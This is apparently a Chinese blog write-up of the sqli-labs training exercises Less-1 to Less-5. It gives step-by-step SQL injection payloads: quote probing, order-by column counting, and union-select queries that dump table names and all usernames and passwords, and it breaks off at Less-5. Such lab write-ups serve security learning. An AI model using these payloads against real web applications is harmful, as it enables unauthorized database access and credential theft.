sqli-labs解题记录

Less-1

1.进入第一题,显示Please input the ID as parameter with numeric value,告诉了我们参数为id
在这里插入图片描述

2.构造?id=1,页面显示正常
在这里插入图片描述

3.接下来加个单引号,显示语句出错,根据报错信息可以得知参数id的值被单引号包裹
在这里插入图片描述

4.构造?id=1' and '1'='1页面重新显示正常,由此判断出这题是单引号字符型注入
在这里插入图片描述

5.构造?id=1' order by 1 --+通过order by子句来判断该数据表的字段数
页面显示正常
在这里插入图片描述
构造?id=1' order by 2 --+页面显示正常
在这里插入图片描述

构造?id=1' order by 3 --+页面显示正常
在这里插入图片描述

构造?id=1' order by 4 --+页面报错,由此可知该表字段数为3
在这里插入图片描述

6.构造?id=-1' union select 1,2,3 --+判断出回显点为该表的第二、三字段
在这里插入图片描述

7.构造?id=-1' union select 1,2,database() --+知道了数据库名为security
在这里插入图片描述

8.构造?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users
在这里插入图片描述

9.构造?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+在数据库information_schema中的columns里查找出数据库security中的users表的全部字段
在这里插入图片描述

10.构造?id=-1' union select 1,group_concat(username),group_concat(password) from users --+爆出所有的用户名和密码
在这里插入图片描述

Less-2

1.进入第二题,显示Please input the ID as parameter with numeric value,告诉了我们参数为id
在这里插入图片描述

2.构造?id=1,页面显示正常
在这里插入图片描述

3.接下来加个单引号,显示语句出错,根据报错信息可以得知是单引号影响了SQL语句的闭合,由此判断出这题是数字型注入
在这里插入图片描述

4.构造?id=1 order by 1 --+通过order by子句来判断该数据表的字段数
页面显示正常
在这里插入图片描述
构造?id=1 order by 2 --+页面显示正常
在这里插入图片描述
构造?id=1 order by 3 --+页面显示正常
在这里插入图片描述
构造?id=1 order by 4 --+页面报错,由此可知该表字段数为3
在这里插入图片描述

5.构造?id=-1 union select 1,2,3 --+判断出回显点为该表的第二、三字段
在这里插入图片描述

6.构造?id=-1 union select 1,2,database() --+知道了数据库名为security
在这里插入图片描述

7.构造?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users
在这里插入图片描述

8.构造?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+在数据库information_schema中的columns里查找出数据库security中的users表的全部字段
在这里插入图片描述

9.构造?id=-1 union select 1,group_concat(username),group_concat(password) from users --+爆出所有的用户名和密码
在这里插入图片描述

Less-3

1.进入第三题,显示Please input the ID as parameter with numeric value,告诉了我们参数为id
在这里插入图片描述

2.构造?id=1,页面显示正常
在这里插入图片描述

3.接下来加个单引号,显示语句出错,根据报错信息可以得知参数id的值被单引号和括号包裹
在这里插入图片描述

4.构造?id=1') order by 1 --+通过order by子句来判断该数据表的字段数
页面显示正常
在这里插入图片描述
构造?id=1') order by 2 --+页面显示正常
在这里插入图片描述
构造?id=1') order by 3 --+页面显示正常
在这里插入图片描述
构造?id=1') order by 4 --+页面报错,由此可知该表字段数为3
在这里插入图片描述

5.构造?id=-1') union select 1,2,3 --+判断出回显点为该表的第二、三字段
在这里插入图片描述

6.构造?id=-1') union select 1,2,database() --+知道了数据库名为security
在这里插入图片描述

7.构造?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users
在这里插入图片描述

8.构造?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+在数据库information_schema中的columns里查找出数据库security中的users表的全部字段
在这里插入图片描述

9.构造?id=-1') union select 1,group_concat(username),group_concat(password) from users --+爆出所有的用户名和密码
在这里插入图片描述

Less-4

1.进入第四题,显示Please input the ID as parameter with numeric value,告诉了我们参数为id
在这里插入图片描述

2.构造?id=1,页面显示正常
在这里插入图片描述

3.接下来加个双引号,显示语句出错,根据报错信息可以得知参数id的值被双引号和括号包裹
在这里插入图片描述

4.构造?id=1") order by 1 --+通过order by子句来判断该数据表的字段数
页面显示正常
在这里插入图片描述
构造?id=1") order by 2 --+页面显示正常
在这里插入图片描述
构造?id=1") order by 3 --+页面显示正常
在这里插入图片描述
构造?id=1") order by 4 --+页面报错,由此可知该表字段数为3
在这里插入图片描述

5.构造?id=-1") union select 1,2,3 --+判断出回显点为该表的第二、三字段
在这里插入图片描述

6.构造?id=-1") union select 1,2,database() --+知道了数据库名为security
在这里插入图片描述

7.构造?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users
在这里插入图片描述

8.构造?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+在数据库information_schema中的columns里查找出数据库security中的users表的全部字段
在这里插入图片描述

9.构造?id=-1") union select 1,group_concat(username),group_concat(password) from users --+爆出所有的用户名和密码
在这里插入图片描述

Less-5

1.进入第五题,显示Please input the ID as parameter with numeric value,告诉了我们参数为id
在这里插入图片描述

2.构造?id=1,页面显示You are in...........,不再像前4题显示namepassw
在这里插入图片描述

3.接下来加个单引号,显示语句出错,根据报错信息可以得知参数id的值被单引号包裹
在这里插入图片描述

4.构造?id=1‘ order by 1 --+通过order by子句来判断该数据表的字段数
页面显示正常
在这里插入图片描述
构造?id=1' order by 2 --+页面显示正常
在这里插入图片描述
构造?id=1' order by 3 --+页面显示正常
在这里插入图片描述
构造?id=1' order by 4 --+页面报错,由此可知该表字段数为3
在这里插入图片描述

5.构造?id=-1' union select 1,2,3 --+判断回显点,结果发现行不通
在这里插入图片描述

posted @ 2022-03-24 23:07  992chen  阅读(223)  评论(0)    收藏  举报